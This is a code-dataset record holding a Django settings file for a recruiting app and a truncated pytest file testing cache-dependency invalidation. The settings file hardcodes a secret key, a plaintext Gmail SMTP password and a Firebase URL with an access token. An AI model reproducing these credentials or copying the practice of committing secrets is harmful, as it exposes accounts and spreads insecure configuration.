hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | 
qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1f9e2b33b207fef7c3b5a644492509e3963249a3 | 11,404 | py | Python | AIP/settings.py | priyamshah112/AIP | 7bcc01e169f045ef19730fbcf07f6ca785e3032b | [
"MIT"
] | 1 | 2021-12-13T17:49:34.000Z | 2021-12-13T17:49:34.000Z | AIP/settings.py | priyamshah112/AIP | 7bcc01e169f045ef19730fbcf07f6ca785e3032b | [
"MIT"
] | null | null | null | AIP/settings.py | priyamshah112/AIP | 7bcc01e169f045ef19730fbcf07f6ca785e3032b | [
"MIT"
] | null | null | null | """
Django settings for AIP project.
Generated by 'django-admin startproject' using Django 2.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '!#vi4z5lfu9bsgl@a16^=e9_(x^8h&or6l$hy6b!n-b1ln3!43'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'accounts',
'recruiter',
'candidate',
'maintainer'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'AIP.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'AIP.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static'),
]
# For mailing purposes
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_USE_TLS = True
EMAIL_USE_SSL = False
EMAIL_PORT = 587
EMAIL_HOST_USER = 'mum.amptech@gmail.com'
EMAIL_HOST_PASSWORD = 'amp@2019'
OPERATIONS_EMAIL = 'mum.amptech@gmail.com'
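# Illustrative helper (an assumption, not part of the original settings file)
# showing how Django's mail API consumes the SMTP settings above.
def _send_ops_email(subject, message):
    # Imported lazily so this sketch has no side effects at settings load time.
    from django.core.mail import send_mail
    send_mail(subject, message, EMAIL_HOST_USER, [OPERATIONS_EMAIL])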
MAX_FILE_SIZE_MB = 5
MAX_FILE_COUNT = 5
"""
To upload any files in media you can use the format:
>>> path = '<sub_directory_in_media>/<filename>'
for example:
>>> file_name = file_system.save('temp/' + file.name, file)
"""
MEDIA_URL = 'media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
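# Illustrative sketch (an assumption, not part of the original settings file)
# of the upload pattern documented above, enforcing MAX_FILE_SIZE_MB; assumes
# `file` is a Django UploadedFile taken from request.FILES.
def _save_upload(file):
    from django.core.files.storage import FileSystemStorage
    if file.size > MAX_FILE_SIZE_MB * 1024 * 1024:
        raise ValueError('File exceeds the %s MB limit' % MAX_FILE_SIZE_MB)
    file_system = FileSystemStorage()  # defaults to MEDIA_ROOT
    return file_system.save('temp/' + file.name, file)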
DEFAULT_CAND_PICTURE = 'data:img/jpeg;base64,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'
DEFAULT_THANK_VID = 'https://firebasestorage.googleapis.com/v0/b/aplidotai-intern.appspot.com/o/resumeVideos%2Fmanthanchauhan913%40gmail.com?alt=media&token=1b70406d-65d0-46a6-b7c3-4e9a991b752d' | 74.535948 | 7,466 | 0.879867 | 671 | 11,404 | 14.862891 | 0.605067 | 0.019553 | 0.015442 | 0.017547 | 0.052442 | 0.042415 | 0.026772 | 0.026772 | 0.012032 | 0 | 0 | 0.113379 | 0.054893 | 11,404 | 153 | 7,467 | 74.535948 | 0.811932 | 0.087952 | 0 | 0 | 1 | 0.023529 | 0.873762 | 0.831976 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0.070588 | 0.011765 | 0 | 0.011765 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
1f1d840cf8f776c0ae523cefb11cf9db3ebc2d05 | 9,458 | py | Python | tests/test_dependencies.py | akuhnregnier/wildfires | 4d31cbdd4a1303ecebc391a35c73b8f07d8fe400 | [
"MIT"
] | 1 | 2021-01-30T15:38:32.000Z | 2021-01-30T15:38:32.000Z | tests/test_dependencies.py | akuhnregnier/wildfires | 4d31cbdd4a1303ecebc391a35c73b8f07d8fe400 | [
"MIT"
] | null | null | null | tests/test_dependencies.py | akuhnregnier/wildfires | 4d31cbdd4a1303ecebc391a35c73b8f07d8fe400 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import pytest
from wildfires.cache import mark_dependency
from wildfires.exceptions import NotCachedError
from .utils import * # noqa
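# These tests assume a `memory` fixture (supplied via tests/utils) that yields
# a joblib-style cache backend.  The contract under test: `mark_dependency`
# hashes a function's code and default arguments, and
# `memory.cache(dependencies=...)` folds those hashes into the cache key, so
# redefining a dependency with different code or defaults invalidates every
# cached function that (transitively) depends on it.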
@pytest.mark.parametrize("memory", ["cloudpickle", "proxy"], indirect=True)
def test_dependencies(memory):
"""Test that when dependencies change, the cache gets invalidated."""
@memory.cache
@mark_dependency
def f(x):
return x + 1
@memory.cache(dependencies=(f,))
def f2(x):
return f(x) + 10
assert f(1) == 2
assert f2(1) == 12
# Defining the same functions as above should not invalidate the previous cache
# entries.
@memory.cache
@mark_dependency
def f(x):
return x + 1
@memory.cache(dependencies=(f,))
def f2(x):
return f(x) + 10
assert f.check_in_store(1)
assert f2.check_in_store(1)
# However, redefining `f` should invalidate both cache entries.
@memory.cache
@mark_dependency
def f(x):
return x + 2
@memory.cache(dependencies=(f,))
def f2(x):
return f(x) + 10
with pytest.raises(NotCachedError):
f.check_in_store(1)
with pytest.raises(NotCachedError):
f2.check_in_store(1)
assert f(1) == 3
assert f2(1) == 13
@pytest.mark.parametrize("memory", ["cloudpickle", "proxy"], indirect=True)
def test_dependencies_2(memory):
"""Test that when dependencies change, the cache gets invalidated.
This should work even if the cached function is marked as a possible dependency
itself.
"""
@memory.cache
@mark_dependency
def f(x):
return x + 1
@memory.cache(dependencies=(f,))
@mark_dependency
def f2(x):
return f(x) + 10
assert f(1) == 2
assert f2(1) == 12
# Defining the same functions as above should not invalidate the previous cache
# entries.
@memory.cache
@mark_dependency
def f(x):
return x + 1
@memory.cache(dependencies=(f,))
@mark_dependency
def f2(x):
return f(x) + 10
assert f.check_in_store(1)
assert f2.check_in_store(1)
# However, redefining `f` should invalidate both cache entries.
@memory.cache
@mark_dependency
def f(x):
return x + 2
@memory.cache(dependencies=(f,))
@mark_dependency
def f2(x):
return f(x) + 10
with pytest.raises(NotCachedError):
f.check_in_store(1)
with pytest.raises(NotCachedError):
f2.check_in_store(1)
assert f(1) == 3
assert f2(1) == 13
@pytest.mark.parametrize("memory", ["cloudpickle", "proxy"], indirect=True)
def test_dependencies_default_args(memory):
"""Test cache is invalidated when default arguments of dependencies change."""
@memory.cache
@mark_dependency
def f(x=0):
return x + 1
@memory.cache(dependencies=(f,))
@mark_dependency
def f2(x):
return f(x) + 10
assert f(1) == 2
assert f2(1) == 12
# Defining the same functions as above should not invalidate the previous cache
# entries.
@memory.cache
@mark_dependency
def f(x=0):
return x + 1
@memory.cache(dependencies=(f,))
@mark_dependency
def f2(x):
return f(x) + 10
assert f.check_in_store(1)
assert f2.check_in_store(1)
# However, redefining `f` should invalidate both cache entries.
@memory.cache
@mark_dependency
def f(x=1):
return x + 1
@memory.cache(dependencies=(f,))
@mark_dependency
def f2(x):
return f(x) + 10
assert f.check_in_store(1)
with pytest.raises(NotCachedError):
f2.check_in_store(1)
assert f(1) == 2
assert f2(1) == 12
@pytest.mark.parametrize("memory", ["cloudpickle", "proxy"], indirect=True)
def test_chained_dependencies(memory):
"""Test cache is invalidated when chained dependencies change."""
@memory.cache
@mark_dependency
def f(x=0):
return x + 1
@memory.cache(dependencies=(f,))
@mark_dependency
def f1(x=0):
return f(x) - 10
@memory.cache(dependencies=(f1,))
@mark_dependency
def f2(x):
return f1(x) + 100
assert f(1) == 2
assert f1(1) == -8
assert f2(1) == 92
# Defining the same functions as above should not invalidate the previous cache
# entries.
@memory.cache
@mark_dependency
def f(x=0):
return x + 1
@memory.cache(dependencies=(f,))
@mark_dependency
def f1(x=0):
return f(x) - 10
@memory.cache(dependencies=(f1,))
@mark_dependency
def f2(x):
return f1(x) + 100
for func in (f, f1, f2):
assert func.check_in_store(1)
# However, redefining `f` should invalidate all cache entries.
@memory.cache
@mark_dependency
def f(x=0):
return x + 2
@memory.cache(dependencies=(f,))
@mark_dependency
def f1(x=0):
return f(x) - 10
@memory.cache(dependencies=(f1,))
@mark_dependency
def f2(x):
return f1(x) + 100
for func in (f, f1, f2):
with pytest.raises(NotCachedError):
func.check_in_store(1)
assert f(1) == 3
assert f1(1) == -7
assert f2(1) == 93
@pytest.mark.parametrize("memory", ["cloudpickle", "proxy"], indirect=True)
@pytest.mark.parametrize("redefine", ["f", "f0", "f+f0"])
def test_multiple_chained_dependencies(memory, redefine):
"""Test cache is invalidated when chained dependencies change."""
@memory.cache
@mark_dependency
def f(x=0):
return x + 1
@memory.cache
@mark_dependency
